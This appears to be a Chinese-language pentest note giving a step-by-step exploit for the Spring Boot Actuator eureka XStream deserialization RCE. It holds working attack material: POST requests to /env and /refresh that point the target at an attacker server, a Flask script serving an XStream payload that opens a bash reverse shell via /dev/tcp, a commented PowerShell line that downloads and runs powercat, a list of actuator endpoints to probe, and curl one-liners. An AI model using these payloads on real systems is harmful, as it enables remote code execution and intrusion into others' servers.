Sping-漏洞

Spring Boot Actuator(eureka xstream deserialization RCE)

参考资料：
https://www.jianshu.com/p/91a5ca9b7c1c 本文的大部分步骤
https://github.com/LandGrey/SpringBootVulExploit Spring Boot 相关漏洞学习资料，利用方法和技巧合集
https://www.onebug.org/websafe/98955.html MAT 查找 spring heapdump 中的密码明文

正常访问

利用条件

• 可以 POST 请求目标网站的 /env 接口设置属性
• 可以 POST 请求目标网站的 /refresh 接口刷新配置（存在 spring-boot-starter-actuator 依赖）
• 目标使用的 eureka-client < 1.8.7（通常包含在 spring-cloud-starter-netflix-eureka-client 依赖中）
• 目标可以请求攻击者的 HTTP 服务器（请求可出外网）

第一步 判断是否出网

1. http://dnslog.cn/ 开启监听

2.1 设置 eureka.client.serviceUrl.defaultZone 属性

spring 1.x（一定要指定内容类型，不能有其他类型）
##############################################################################################
POST /env
Content-Type: application/x-www-form-urlencoded

eureka.client.serviceUrl.defaultZone=http://your-vps-ip:2222/xstream
##############################################################################################

spring 2.x
##############################################################################################
POST /actuator/env
Content-Type: application/json

{"name":"eureka.client.serviceUrl.defaultZone","value":"http://your-vps-ip/xstream"}
##############################################################################################


把以上的http url链接替换为dnslog地址，如果dnslog收到请求

第二步 架设响应恶意 XStream payload 的网站(在自己的服务器上)

# -*- coding: utf-8 -*-
# @Time    : 2019/3/12 10:06
# @Author  : j1anFen
# @Site    :
# @File    : run.py


# linux反弹shell bash -i >& /dev/tcp/192.168.20.82/9999 0>&1
# windows反弹shell
# <string>powershell</string>
# <string>IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');</string>
# <string>powercat -c 192.168.123.1 -p 2333 -e cmd</string>

from flask import Flask, Response

app = Flask(__name__)

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>', methods = ['GET', 'POST'])
def catch_all(path):
    xml = """<linked-hash-set>
  <jdk.nashorn.internal.objects.NativeString>
    <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
      <dataHandler>
        <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
          <is class="javax.crypto.CipherInputStream">
            <cipher class="javax.crypto.NullCipher">
              <serviceIterator class="javax.imageio.spi.FilterIterator">
                <iter class="javax.imageio.spi.FilterIterator">
                  <iter class="java.util.Collections$EmptyIterator"/>
                  <next class="java.lang.ProcessBuilder">
                    <command>
                                <string>/bin/bash</string>
                      <string>-c</string>
                      <string>bash -i >&amp; /dev/tcp/88.88.88.88/3333 0>&amp;1</string>
                    </command>
                    <redirectErrorStream>false</redirectErrorStream>
                  </next>
                </iter>
                <filter class="javax.imageio.ImageIO$ContainsFilter">
                  <method>
                    <class>java.lang.ProcessBuilder</class>
                    <name>start</name>
                    <parameter-types/>
                  </method>
                  <name>foo</name>
                </filter>
                <next class="string">foo</next>
              </serviceIterator>
              <lock/>
            </cipher>
            <input class="java.lang.ProcessBuilder$NullInputStream"/>
            <ibuffer></ibuffer>
          </is>
        </dataSource>
      </dataHandler>
    </value>
  </jdk.nashorn.internal.objects.NativeString>
</linked-hash-set>"""
    return Response(xml, mimetype='application/xml')
if __name__ == "__main__":
    app.run(host='0.0.0.0', port=2222)

第三步 利用

总的来说和第一步一样，把出网的payload。换成指向我们自己架设的恶意XStream，要执行的命令都在第二步的py脚本里面

常见路径

/actuator
/auditevents
/autoconfig
/beans
/caches
/conditions
/configprops
/docs
/dump
/env
/flyway
/health
/heapdump
/httptrace
/info
/intergrationgraph
/jolokia
/logfile
/loggers
/liquibase
/metrics
/mappings
/prometheus
/refresh
/scheduledtasks
/sessions
/shutdown
/trace
/threaddump
/actuator/auditevents
/actuator/beans
/actuator/health
/actuator/conditions
/actuator/configprops
/actuator/env
/actuator/info
/actuator/loggers
/actuator/heapdump
/actuator/threaddump
/actuator/metrics
/actuator/scheduledtasks
/actuator/httptrace
/actuator/mappings
/actuator/jolokia
/actuator/hystrix.stream
/api.html
/sw/swagger-ui.html
/api/swagger-ui.html
/template/swagger-ui.html
/spring-security-rest/api/swagger-ui.html
/spring-security-oauth-resource/swagger-ui.html
/api-docs
/v2/api-docs
/swagger-ui.html
trace
health
loggers
metrics
autoconfig
heapdump
threaddump
env
info
dump
configprops
mappings
auditevents
beans
jolokia
cloudfoundryapplication
hystrix.stream
actuator
actuator/auditevents
actuator/beans
actuator/health
actuator/conditions
actuator/configprops
actuator/env
actuator/info
actuator/loggers
actuator/heapdump
actuator/threaddump
actuator/metrics
actuator/scheduledtasks
actuator/httptrace
actuator/mappings
actuator/jolokia
actuator/hystrix.stream

总结 快速发送payload

curl 8.8.8.8:9002/env -d "eureka.client.serviceUrl.defaultZone=http://VPS/xstream"            # 推送配置
curl 8.8.8.8:9002/refresh -X POST                                                             # 刷新配置